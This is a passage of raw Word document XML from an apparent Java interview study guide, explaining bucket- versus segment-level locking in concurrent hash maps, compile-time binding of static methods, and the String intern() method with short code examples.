          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., instance field) resides in the heap memory but is shared across all threads, which allows the instance to be accessed globally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D2C88F" w14:textId="36CFB37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21FED">
          <v:rect id="_x0000_i1233" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5302B770" w14:textId="3B5693DF" w:rsidR="006151C3" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9093D" w:rsidP="001C0DAC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc197867302"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between bucket level and segment level locking</w:t>
      </w:r>
      <w:r w:rsidR="006151C3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w14:paraId="5068E8F6" w14:textId="3ACF7844" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E" w:rsidP="00BD53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ucket-level Locking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098476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each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66CB85AE"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fine-grained level, meaning that a thread will lock only the specific bucket that it is modifying.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D44CBD"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This approach allows multiple threads to access different buckets simultaneously (if they are modifying different buckets), improving concurrency and performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7390B10B"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Only the particular bucket being accessed is locked. Other buckets can still be accessed or modified by other threads concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E4F0A7"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Since only individual buckets are locked, it reduces contention (fewer threads are blocked), leading to better performance when multiple threads are working on different buckets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F101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6DD9F681"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compared to segment-level locking because each bucket can be accessed by different threads independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD29697"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helps in achieving better throughput and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E8161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CA363A4"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multiple locks can be more complex.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33325FEC"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keys map to the same bucket (in case of hash collisions), it can still lead to contention within that bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E96B64E"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Bucket-level Locking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DC927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a hash map where each bucket is a linked list of entries, and each list has a lock. Different threads can operate on different buckets without interference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EAFD86"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gment-level Locking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700CDCE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the hash table i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340FBD94"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coarser level (the segment level), meaning that multiple buckets within the same segment are locked together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE8A789"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Multiple threads can access buckets in different segments simultaneously, but only one thread can access the buckets in a particular segment at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A702BA1"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All buckets within the segment are locked at once. So, even if a thread needs to access only one bucket within the segment, the entire segment is locked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4698CE"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While it provides better concurrency than global locking, it is not as efficient as bucket-level locking since threads accessing different buckets within the same segment are blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B60DE1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3E350E98"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than bucket-level locking, as fewer locks are involved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147DA8D3"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ective in scenarios where the hash table is split into segments that are less frequently accessed simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C264B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39DC36D"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compared to bucket-level locking because multiple buckets within a segment are locked together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165F005F"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 accessing different buckets within the same segment cannot operate concurrently, which could cause contention and performance bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559DF2D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egment-level Locking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2779C9A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67810">
          <v:rect id="_x0000_i1234" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9B7B40"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3503"/>
        <w:gridCol w:w="5396"/>
      </w:tblGrid>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="44C79B3D" w14:textId="77777777" w:rsidTr="00A76D6E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43D3FF4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6F4DCAC"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cket-level Locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AC28DD2"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gment-level Locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="2DEC0BFA" w14:textId="77777777" w:rsidTr="00A76D6E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="389B46D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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37FA154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 per bucket)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="100F16D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arse-grained (lock per segment)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="606B1AC9" w14:textId="77777777" w:rsidTr="00A76D6E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53942F7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76ECCF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more independent access to buckets)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75E8009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locks entire segment, blocking other buckets in the same segment)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="54C88FE8" w14:textId="77777777" w:rsidTr="00A76D6E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07EF75F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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="088CB875"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individual buckets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="198D176E"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all buckets within a segment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="719DCE12" w14:textId="77777777" w:rsidTr="00A76D6E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D4592E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12220D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high-concurrency scenarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75524E9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result in contention in scenarios where multiple threads access different buckets in the same segment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="06AC45FF" w14:textId="77777777" w:rsidTr="00A76D6E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DF772D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28FE588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manage multiple locks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="409747DA"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fewer locks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="4CA489C0" w14:textId="77777777" w:rsidTr="00A76D6E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A060C4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ntion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75119B9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contention, unless there are hash collisions within a bucket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F8AD89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ntention if multiple threads access the same segment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F4563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040B6836"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57FF27">
          <v:rect id="_x0000_i1235" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15697079" w14:textId="58483329" w:rsidR="006151C3" w:rsidRPr="00CE4B95" w:rsidRDefault="00332200" w:rsidP="001C0DAC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc197867303"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How is the static method bound with an object</w:t>
      </w:r>
      <w:r w:rsidR="006151C3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w14:paraId="28CE3CC7" w14:textId="1365DD4D" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="0004293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bound to an instance (object) of a class but are boun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Understand:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C488512"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Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6525E133"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is defined using the static keyword in the method signature. Static methods belong to the class itself rather than to instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793D3D50"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3D66137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void staticMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100550D7"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36FAF9B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A7808"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BBE9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Call</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FBB872"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all a static method using the class name directly, without the need to create an object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDF9E1F"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staticMethod(); // Calling static method without creating an object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C1C14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ding of Static Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6220FCF0"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bound at compile-time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, not runtime. This is known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>early bi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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269460DA"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static method, the method is resolved at compile-time based on the class type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2554409F"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you invoke a static method via an object reference, it is still bound to the class type, not the object type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3FDACC"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B97F1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6F4CFA3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77288CB6"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69AB15E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34B0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113F47" w14:textId="77777777" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B55F70"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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1AFA98"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0C67D2"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2EF7AB85"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7BEB0D"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 via object reference (not recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F5347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staticMethod();  // It's bound to MyClass, not the obj instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EB15BF"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E09AA"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rrect way of calling static method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB5B153"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staticMethod();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24608C9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DD1EC"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6B2180"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2F1126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55AD5D9"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8CAD207"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Static Methods Are Bound to the Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133E5E2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designed to operate on </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class-level data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., static variables) rather than instance-level data (i.e., instance variables). Since they are not tied to any specific object, they belong to the class itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAE1BA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knows the static method belongs to the class at the time of compilation, which is why static methods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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64671B86"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Method Binding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6297BF51"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ound at compile-time (early binding).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729365E2"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Bound at runtime (late binding), depending on the actual object type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB878AE"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static methods are not associated with instances of the class, but with the class itself</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. While it is technically possible to invoke a static method using an object reference, it is best practice to call static methods using the class name directly for clarity and convention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160B1DEF" w14:textId="4ADDBC30"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BDD83">
          <v:rect id="_x0000_i1236" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE7B40A" w14:textId="4BB01254" w:rsidR="006151C3" w:rsidRPr="00CE4B95" w:rsidRDefault="000362CB" w:rsidP="001C0DAC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc197867304"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of the intern() method in String class</w:t>
      </w:r>
      <w:r w:rsidR="006151C3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w14:paraId="141358EB" w14:textId="71421A49" w:rsidR="004F6FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004F6FF9"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xml:space="preserve"> method in the String class in Java is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ensure that strings with the same content share the same memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. When you call the intern() method on a string, it checks if an identical string already exists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intern():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A87FB5E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC31F6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Java, there is a special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 method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows strings that are not literals (dynamically created strings) to be added to the pool, ensuring that strings with the same content share the same reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275225DD"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intern()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15835FC3"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voke intern() on a string, it ensures that the string either points to an existing string in the pool (if it matches another string) or is added to the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFD7276"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be particularly useful for optimizing memory usage, as it eliminates duplicate strings and ensures that strings with the same value are stored only once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751D02AA"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4FC1FE0"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rnExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075FD8C7"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0BFC46"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new String("Hello");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD9C2D2"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new String("Hello");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2613F7BE"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3EB6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ithout using intern()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023A647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because they are different objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152C52B1"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6D0BA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intern() method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5264A46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str1.intern();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0355EF"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str2.intern();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D04A83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B5F928"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using intern()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E244FC4"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3 == str4); // true, because both refer to the same string in the pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0215030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22AC1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31BCAF"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B2088E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lse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A31AF9C"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6F2AC065"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23E2E5"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intern(), str1 and str2 are two distinct objects in memory, even though they have the same content ("Hello").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C43CF0"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alling intern() on both str1 and str2, both str3 and str4 point to the same string in the string pool, which is why str3 == str4 returns true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3862A38C"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intern():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B28FBF7"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ptimization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you have many strings with the same content (e.g., user input or dynamically generated strings), calling intern() ensures that only one instance of each unique string is stored in memory, saving space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E56FEDC"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Comparisons</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since strings in the string pool are guaranteed to be unique by reference, you can use == to compare string references instead of equals() to check if two strings are the same, which can be faster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7C0660"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tential Drawbacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630D8383"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Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Interning strings may have a small performance overhead because Java needs to search the string pool to check for existing strings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187B3559"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Consumption</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: While interning can save memory for repeated strings, if overused, it can increase memory consumption by filling up the string pool with too many distinct strings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BA5B5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D4FFC4B"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37" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3438A9FC" w14:textId="77777777" w:rsidR="005B2F6C" w:rsidRPr="00CE4B95" w:rsidRDefault="005B2F6C" w:rsidP="005B2F6C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02172070" w14:textId="77777777" w:rsidR="00322B4D" w:rsidRPr="00CE4B95" w:rsidRDefault="00322B4D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="051DEAC6" w14:textId="443D81C1" w:rsidR="00322B4D" w:rsidRPr="00CE4B95" w:rsidRDefault="00322B4D" w:rsidP="00322B4D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc197867305"/>
      <w:r w:rsidRPr="00CE4B95">
